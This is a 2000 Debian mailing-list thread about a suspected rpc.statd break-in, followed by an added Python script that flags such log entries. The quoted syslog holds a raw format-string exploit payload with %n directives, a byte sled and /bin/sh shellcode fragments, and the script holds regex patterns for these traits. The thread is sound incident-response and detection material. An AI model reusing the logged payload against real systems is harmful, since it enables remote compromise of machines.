At first glance, this appears to be an attempt to exploit rpc.statd. If they *DID* get in, you have no way of knowing what may or may not have been modified. I just dealt with a machine about two weeks ago that had a very extensive rootkit installed. The only way it was noticed that the machine had been compromised was that the admin noticed many processes named "tfn-daemon" installed, which, for the uninitiated, is the Tribal Flood Network DDoS tools.
Reinstall your system. It sucks, but it's a learning experience. -jg -- Jeremy L. Gaddis <[EMAIL PROTECTED]> -----Original Message----- From: Ron Hale-Evans [SMTP:[EMAIL PROTECTED] Sent: Sunday, October 01, 2000 1:53 PM To: debian-user@lists.debian.org Subject: Was my system cracked? (retry 2) [snip] Sep 30 19:10:53 ludism syslogd: Cannot glue message parts together Sep 30 19:10:53 ludism 173 Sep 30 19:10:53 /sbin/rpc.statd[205]: gethostbyname error for ^X-?ø^X-?ø^Y-?ø^Y-?ø^Z-?ø^Z-?ø^[-?ø^[-?ø%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n%137x%n%10x%n%192x%nêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêê1¿Î|YâA^PâA^H?¿âA^Dâ^?¿â^A?fÕÄ?^BâY^L?A^Nô?A^H^PâI^DÄA^D^Là^A?fÕÄ?^D?fÕÄ?^E0¿àA^D?fÕ Sep 30 19:10:53 ludism «^F/bin«F^D/shA0¿àF^Gâv^LçV^PçN^LâÛ?^KÕÄ?^AÕÄË??? Sep 30 19:14:01 ludism /USR/SBIN/CRON[32067]: (news) CMD (rnews -U) Sep 30 19:14:01 ludism innd: ME time 300548 idle 300544(2) artwrite 0(0) artlink 0(0) hiswrite 0(0) hissync 0(3) So, do you think my machine has been cracked? It looks as though they've been trying to cover their tracks, but not doing it very well. If it is a crack, what can I do about it apart from wiping the machine and rebuilding from the ground up? Thanks... 
Ron Hale-Evans

--
Ron's Info Closet: Center for Ludic Synergy, Kennexions Glass Bead Game, Positive Revolution FAQ, Hexagram-8 I Ching Mailing List, and links...
Ron Hale-Evans ... [EMAIL PROTECTED] ... <http://www.apocalypse.org/~rwhe/>
Further up and further in!
fnord
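
Added example, not part of the original thread or written by either poster: a small Python check that flags syslog lines showing the traits visible in the quoted log (printf directives such as %n inside the rpc.statd "gethostbyname error" hostname, syslogd's "Cannot glue message parts together" notice, and a shell path embedded in binary data). The sample lines are constructed with a shortened, inert stand-in for the payload, and the thresholds and function names are assumptions.

```python
import re
import string

# %n (also %hn, %5$n) makes a printf-style call write to memory;
# %x / %8x / %236x only read or pad, but a run of them usually accompanies it.
WRITE_DIRECTIVE = re.compile(r"%(?:\d+\$)?\d*h{0,2}n")
PAD_DIRECTIVE = re.compile(r"%\d*x")
STATD_ERROR = re.compile(r"rpc\.statd\[\d+\]: gethostbyname error for (.*)", re.S)
HOSTNAME_CHARS = set(string.ascii_letters + string.digits + ".-")

def findings(line):
    """Return the reasons one syslog line resembles the entries quoted above."""
    reasons = []
    m = STATD_ERROR.search(line)
    if m:
        name = m.group(1).strip()
        if WRITE_DIRECTIVE.search(name):
            reasons.append("%n write directive in hostname")
        if len(PAD_DIRECTIVE.findall(name)) >= 4:       # assumed threshold
            reasons.append("run of %x directives in hostname")
        odd = sum(ch not in HOSTNAME_CHARS for ch in name)
        if name and odd / len(name) > 0.5:              # assumed threshold
            reasons.append("hostname is mostly non-hostname bytes")
    if "Cannot glue message parts together" in line:
        reasons.append("syslogd could not reassemble an oversized message")
    if "/sh" in line and any(ord(ch) > 126 for ch in line):
        reasons.append("shell path embedded in binary data")
    return reasons

def scan(lines):
    """Map 1-based line number -> reasons, for lines with at least one finding."""
    return {n: r for n, line in enumerate(lines, 1) if (r := findings(line))}

# Constructed sample, shaped like the quoted log but with a shortened,
# inert stand-in for the binary payload; host and hostname are made up.
SAMPLE = [
    "Sep 30 19:10:53 host syslogd: Cannot glue message parts together",
    "Sep 30 19:10:53 host 173 Sep 30 19:10:53 /sbin/rpc.statd[205]: "
    "gethostbyname error for ^X-?\u00f8%8x%8x%8x%8x%236x%n%137x%n" + "\u00ea" * 40,
    "Sep 30 19:10:53 host \u00ab^F/bin\u00abF^D/shA0",
    "Sep 30 19:12:10 host /sbin/rpc.statd[205]: gethostbyname error for nfs1.example.org",
    "Sep 30 19:14:01 host /USR/SBIN/CRON[32067]: (news) CMD (rnews -U)",
]

if __name__ == "__main__":
    for lineno, reasons in scan(SAMPLE).items():
        print(lineno, "; ".join(reasons))
```

A hit only shows that the request reached the daemon and was logged; it does not tell you whether the attempt succeeded.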